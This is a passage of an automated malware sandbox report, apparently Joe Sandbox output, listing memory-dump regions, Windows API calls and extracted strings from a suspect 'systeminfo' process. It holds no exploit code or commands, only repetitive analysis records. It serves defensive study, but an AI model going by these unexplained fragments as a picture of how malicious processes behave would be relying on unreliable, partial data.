                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005C82BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,005C1CC0,005D7F1E,005D55DE,005C1C8D), ref: 005C80B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005C82BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,005C1CC0,005D7F1E,005D55DE,005C1C8D), ref: 005C80B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 005C0DBD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04754742
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04754787
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047546FC
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04754725
                                                                                                                                                                                • Execute=1, xrefs: 04754713
                                                                                                                                                                                • ExecuteOptions, xrefs: 047546A0
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04754655
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0475031E
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047502E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047502BD
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 04757BAC
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04757B7F
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 04757B8E
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0475728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04757294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047572C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047572A3
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$0$:!$age=$qz9A
                                                                                                                                                                                • API String ID: 0-1418462814
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GQZ$VW\F$V]EA$Y]$^[YW
                                                                                                                                                                                • API String ID: 0-3218079648
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$:!$G8qz$qz9A
                                                                                                                                                                                • API String ID: 0-2035482291